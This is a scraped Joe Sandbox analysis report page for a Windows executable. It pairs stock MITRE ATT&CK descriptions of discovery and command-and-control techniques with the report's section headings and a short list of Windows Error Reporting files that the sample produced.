Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iGxCM2I5u9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_iGxCM2I5u9.exe_ba38550e7d6f47114336f3c752a4f3c785248ac_26afa5d7_f19546a9-fe2e-4de8-b173-2206535a8c0c\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DAB.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F71.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FC0.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
iGxCM2I5u9.exe